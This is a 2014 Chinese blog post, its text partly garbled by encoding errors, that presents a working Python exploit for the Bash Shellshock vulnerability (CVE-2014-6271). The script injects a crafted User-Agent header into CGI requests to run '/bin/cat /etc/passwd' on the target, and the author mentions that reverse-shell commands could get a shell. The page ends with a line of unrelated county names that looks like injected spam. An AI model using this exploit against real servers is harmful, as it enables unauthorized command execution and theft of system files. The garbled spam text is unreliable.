qileilove

          blog已經(jīng)轉(zhuǎn)移至github,大家請訪問 http://qaseven.github.io/

          Bash遠程命令執(zhí)行漏洞(CVE-2014-6271)分析利用

          這幾天Bash被爆存在遠程命令執(zhí)行漏洞(CVE-2014-6271),昨天參加完isc,晚上回家測試了一下,寫了個python版本的測試小基本,貼上代碼:
          #coding:utf-8
          import urllib,httplib
          import sys,re,urlparse
          #author:nx4dm1n
          #website:http://www.nxadmin.com
          def bash_exp(url):
          urlsp=urlparse.urlparse(url)
          hostname=urlsp.netloc
          urlpath=urlsp.path
          conn=httplib.HTTPConnection(hostname)
          headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
          conn.request("GET",urlpath,headers=headers)
          res=conn.getresponse()
          res=res.getheaders()
          for passwdstr in res:
          print passwdstr[0]+':'+passwdstr[1]
          if __name__=='__main__':
          #帶http
          if len(sys.argv)<2:
          print "Usage: "+sys.argv[0]+" http://www.nxadmin.com/cgi-bin/index.cgi"
          sys.exit()
          else:
          bash_exp(sys.argv[1])
            腳本執(zhí)行效果如圖所示:
            bash命令執(zhí)行
            也可以用burp進行測試。
            利用該漏洞其實可以做很多事情,寫的python小腳本只是執(zhí)行了cat /etc/passwd。可以執(zhí)行反向鏈接的命令等,直接獲取一個shell還是有可能的。不過漏洞存在的條件也比較苛刻,測試找了一些,發(fā)現(xiàn)了很少幾個存在漏洞

          posted on 2014-12-08 20:43 順其自然EVO 閱讀(348) 評論(0)  編輯  收藏 所屬分類: 測試學習專欄

          <2014年12月>
          30123456
          78910111213
          14151617181920
          21222324252627
          28293031123
          45678910

          導航

          統(tǒng)計

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 吴川市| 洱源县| 尖扎县| 荆州市| 缙云县| 白水县| 新郑市| 西乌珠穆沁旗| 陇西县| 湘潭县| 卢龙县| 东至县| 揭西县| 保靖县| 孝感市| 南充市| 武冈市| 高唐县| 巢湖市| 万荣县| 新河县| 南充市| 休宁县| 三穗县| 饶河县| 会泽县| 冀州市| 大理市| 鸡东县| 桂林市| 秦安县| 微山县| 台江县| 衡水市| 高淳县| 临沂市| 保康县| 团风县| 桃源县| 虞城县| 海安县|